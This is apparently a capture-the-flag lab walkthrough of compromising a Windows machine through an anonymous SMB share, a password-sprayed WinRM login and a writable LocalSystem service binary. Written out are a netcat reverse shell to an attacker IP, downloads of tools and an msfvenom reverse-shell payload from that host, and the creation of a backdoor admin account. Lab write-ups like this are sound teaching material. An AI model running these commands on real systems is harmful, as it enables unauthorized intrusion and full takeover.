From now on I’ve added my “MayorScan3000” portscanning tool into the equation when I’m kicking off, as folks have been telling me I waste time by not scanning all ports. So I juiced up my port scanner to run with threading enabled. Meanwhile I’ll still do my basic Nmap Scan as well to grab those immediate results.
nmap -p135,139,445,3389,5985 -A 172.31.1.18
Nmap doesn’t return much information, but we do see that SMB is running on the target, which can give us a good start. Let’s enumerate!
We can begin by inspecting the SMB service using smbclient.
smbclient -L 172.31.1.18
Running smbclient shows that there are several shares, with “backups” being accessible. We need to investigate this further.
smbclient \\\\172.31.1.18\\backups -U ”
Well this was pretty easy, right? We’ve discovered a misconfigured share that allows anonymous access to the C:\. Let’s exploit it!
With such unrestricted access to the file system, we should really search around some. We can quickly check the Users directory, which shows us the user “jamie.” Additionally we can head to jamie’s Desktop and grab the user flag there.
User Flag on Jamie’s Desktop
So now that we have a flag, and a user name, we need to determine what to do from here. We discovered a username, so we could try to enumerate that a bit. Let’s use Crackmapexec for this.
crackmapexec smb 172.31.1.18 -u jamie -p /root/Desktop/passes.txt
Crackmapexec makes quick work of locating a password for the user. We saw port 5985 open earlier which means we can probably use Evil-WinRM to connect. Let’s do that.
evil-winrm -i 172.31.1.18 -u jamie -p redacted
We are successfully logged in! We see that we are jamie on the machine, and now we need to get to escalating our privileges. We can start by starting a Python server and pulling our tools to the target machine and running winPEAS to start.
powershell -c wget “http://10.10.0.7:8000/winPEAS.exe” -outfile “winPEAS.exe”; C:\Users\jamie\Documents\winPEAS.exe
Keep in mind we are using PowerShell currently and need to provide the entire program path in order to run it. Unfortunately we aren’t able to find any real information about the machine or escalation in winPEAS. This was the same with PowerUp.ps1 as well. I started scratching my head for a moment and had to remind myself that there are plenty of ways to manually enumerate privileges, services, etc. Let’s do some of that.
Our user privileges don’t show much that we can take advantage of unfortunately. We can check for running services next.
services (not a typical way to execute this query)
The above took some trial and error because Powershell uses “Get-Services” to list the running services, and that wasn’t working as expected. Running services did, however, which revealed the above. Of note is the monitor1 and monitor2 services. Unfortunately we cannot do much to gather more information on these from Evil-WinRM, so I decided to move to a reverse shell using Netcat, and get out of Powershell. This required me to transfer a Netcat.exe binary to the machine first, and then connect to my Kali machine.
Top nc -nlvp 5555; Bottom C:\Users\jamie\Documents\nc.exe 10.10.0.7 5555 -e cmd.exe; Top – sc qc monitor1
We see that the service is running as LocalSystem, and that it can be started/stopped. Knowing this, we need to ensure that we can modify the directory and it’s contents. We can use icacls for this.
There is a lot going on in the above image, but what is important is that Users has a RX and W in the results. This means that we can Read, Write, and Execute in the directory location. Now all we need to do then is to replace the monitor1.exe with a malicious executable and restart the service.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.7 LPORT=2246 -f exe > monitor1.exe
We can not move this to the target machine, start another Netcat listener to catch the shell, and start the service.
Left – powershell -c wget “http://10.10.0.7:8000/monitor1.exe” -outfile “monitor1.exe”; sc stop monitor1; Right – nc -nlvp 2246; Left – sc start monitor1; Right – reverse shell successful
A quick whoami shows that we are NT AUTHORITY\SYSTEM. We can head to the Administrator’s Desktop quick to grab the system flag.
System.txt flag on Administrator’s Desktop
We can additionally do some Post-Exploitation to take full control of the machine.
Right – net user themayor !Password123 /add; net localgroup Administrators themayor /add; Left – xfreerdp /u:themayor /p:’!Password123′ /v:172.31.1.18 RDP Login
A quick check of the server users shows that we are indeed a Server Admin now.